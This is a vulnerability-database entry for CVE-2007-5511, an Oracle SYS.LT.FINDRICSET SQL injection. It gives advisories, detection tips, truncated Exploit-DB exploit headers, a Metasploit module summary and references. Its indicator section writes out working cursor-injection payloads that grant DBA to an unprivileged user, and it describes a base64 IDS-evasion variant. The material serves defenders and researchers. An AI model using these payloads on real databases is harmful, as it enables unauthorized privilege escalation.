CVE-2007-5511
Published 2007-10-17
Priority P3 · 48 · medium · CVSS 2.0 base score 6.5 (vector AV:N/AC:L/Au:S/C:P/I:P/A:P)
Exploit available · EPSS 31.76% (98.1th percentile)
SQL injection vulnerability in Workspace Manager for Oracle Database before OWM 10.2.0.4.1, OWM 10.1.0.8.0, and OWM 9.2.0.8.0 allows attackers to execute arbitrary SQL commands via the FINDRICSET procedure in the LT package. NOTE: this is probably covered by CVE-2007-5510, but there are insufficient details to be certain.
Detection & IOCs (extracted from sources)
Command: SYS.LT.FINDRICSET('TGV2ZWwgMSBjb21sZXRlIDop.U2VlLnUubGF0ZXIp''||dbms_sql.execute('||c2gya2Vy||')||''','DEADBEAF')
Command: DBMS_SQL.PARSE(MYC,'declare pragma autonomous_transaction; begin execute immediate ''GRANT DBA TO <user>'';commit;end;',0)
- Detect SQL injection attempts targeting SYS.LT.FINDRICSET with a cursor injection payload: look for the string 'dbms_sql.execute' concatenated inside the first argument of SYS.LT.FINDRICSET calls in Oracle audit/SQL logs.
- Alert on creation of a user-owned function named 'OWN' with AUTHID CURRENT_USER and PRAGMA AUTONOMOUS_TRANSACTION containing EXECUTE IMMEDIATE 'GRANT DBA', which is the first-variant exploit technique.
- Monitor Oracle audit trails for unprivileged users receiving GRANT DBA immediately following execution of SYS.LT.FINDRICSET, as the exploit's goal is privilege escalation to DBA.
- The Metasploit auxiliary module 'auxiliary/sqli/oracle/lt_findricset_cursor' can be used to test for this vulnerability; use of this module against Oracle 10.1.0.3.0–10.1.0.5.0 and 11g should be flagged.
- The exploit requires the attacker to already have a valid Oracle database account (unprivileged user); it does not provide unauthenticated access. It is a privilege escalation from any DB user to DBA.
- The vulnerability was fixed in Oracle Critical Patch Update October 2007; affected versions are OWM 10.2.0 before 10.2.0.4.1, OWM 10.1.0 before 10.1.0.8.0, and OWM 9.2.0 before 9.2.0.8.0.
- The IDS-evasion variant (Exploit-DB 4572) uses UTL_ENCODE BASE64 decoding to hide the GRANT DBA payload from signature-based detection; plain-text string matching on 'GRANT DBA' will miss this variant.
GHSA-mv98-3pjv-4gv2 (GHSA, unreviewed · 2022-05-01 · CVSS 6.5 · MEDIUM · CWE-89 · CVE-2007-5511): SQL injection vulnerability in Workspace Manager for Oracle Database before OWM 10.2.0.4.1, OWM 10.1.0.8.0, and OWM 9.2.0.8.0; the advisory text is identical to the CVE description above.
GHSA-mfm4-69wq-jq8q (GHSA, unreviewed · 2022-05-01 · CVSS 6.5 · MEDIUM · CVE-2007-5510): Multiple unspecified vulnerabilities in the Workspace Manager component in Oracle Database before OWM 10.2.0.4.1, OWM 10.1.0.8.0, and OWM 9.2.0.8.0 have unknown impact and remote attack vectors, aka (1) DB08, (2) DB09, (3) DB10, (4) DB11, (5) DB12, (6) DB13, (7) DB14, (8) DB15, (9) DB16, (10) DB17, and (11) DB18. NOTE: one of these issues is probably CVE-2007-5511, but there are insufficient details to be certain.
No detection rules found.
Exploit-DB: Oracle 10g/11g - 'SYS.LT.FINDRICSET' SQL Injection (2) (exploitdb · 2007-10-27 · CVE-2007-5511)
---
#!/usr/bin/perl
#
# http://rawlab.mindcreations.com/codes/exp/oracle/sys-lt-findricsetV2.pl
#
# Oracle SYS.LT.FINDRICSET exploit (11g/10g)
# - Version 2 - New "evil cursor injection" tip!
# - No "create procedure" privilege needed!
# - See: http://www.databasesecurity.com/ (Cursor Injection)
#
# Grant or revoke dba permission to unprivileged user
#
# Tested on "Oracle Database 10g Enterprise Edition Release 10.1.0.5.0"
#
# Fixed with CPU Oct. 2007
#
# REF: Thanks to Joxean Koret and his excellent Inguma
# http://sourceforge.net/projects/inguma
#
# AUTHOR: Andrea "bunker" Purificato
# http://rawlab.mindcreations.com
#
# DATE: Copyright 2007 - Fri Oct 26 15:03:46 CEST 2007
#
# Oracle InstantClient (basic + sdk) required for DBD::Or
Exploit-DB: Oracle 10g/11g - 'SYS.LT.FINDRICSET' SQL Injection (1) (exploitdb · 2007-10-27 · CVE-2007-5511)
---
#!/usr/bin/perl
#
# http://rawlab.mindcreations.com/codes/exp/oracle/sys-lt-findricset.pl
#
# Oracle SYS.LT.FINDRICSET exploit (11g/10g)
#
# Grant or revoke dba permission to unprivileged user
#
# Tested on "Oracle Database 10g Enterprise Edition Release 10.1.0.5.0"
#
# Fixed with CPU Oct. 2007
#
# REF: Thanks to Joxean Koret and his excellent Inguma
# http://sourceforge.net/projects/inguma
#
# AUTHOR: Andrea "bunker" Purificato
# http://rawlab.mindcreations.com
#
# DATE: Copyright 2007 - Fri Oct 26 15:03:46 CEST 2007
#
# Oracle InstantClient (basic + sdk) required for DBD::Oracle
#
#
# bunker@fin:~$ perl sys-lt-findricset.pl -h localhost -s FAKE -u sfigato -p **** -r
# [-] Wait...
# [-] Revoking DBA from SFIGATO...
# DBD::Oracle
Exploit-DB: Oracle 10g - 'LT.FINDRICSET' SQL Injection (IDS Evasion) (exploitdb · 2007-10-27 · CVE-2007-5511)
---
/******************************************************************/
/******* Oracle 10g LT.FINDRICSET SQL Injection Exploit **********/
/******************************************************************/
/*********** sploit grant DBA to scott **************/
/*********** evil cursor injection **************/
/*********** No "create procedure" privilege needed! *************/
/*********** + Funny IDS evasion with base64 **************/
/******************************************************************/
/***************** tested on oracle 10.1.0.2.0 *******************/
/******************************************************************/
/******************************************************************/
/* Date of Public EXP
Metasploit: Oracle DB SQL Injection via SYS.LT.FINDRICSET Evil Cursor Method
This module will escalate an Oracle DB user to DBA by exploiting a SQL injection bug in the SYS.LT.FINDRICSET package via the Evil Cursor technique. Tested on Oracle 10.1.0.3.0; should work through 10.1.0.5.0 and supposedly on 11g. Fixed with Oracle Critical Patch Update October 2007.
No writeups or analysis indexed.
References
- http://marc.info/?l=bugtraq&m=119332677525918&w=2
- http://osvdb.org/40079
- http://secunia.com/advisories/27251
- http://secunia.com/advisories/27409
- http://securityreason.com/securityalert/3245
- http://www.securityfocus.com/archive/1/482429/100/0/threaded
- http://www.securityfocus.com/bid/26098
- http://www.securitytracker.com/id?1018823
- http://www.vupen.com/english/advisories/2007/3524
- http://www.vupen.com/english/advisories/2007/3626
- https://www.exploit-db.com/exploits/4570
- https://www.exploit-db.com/exploits/4571
- https://www.exploit-db.com/exploits/4572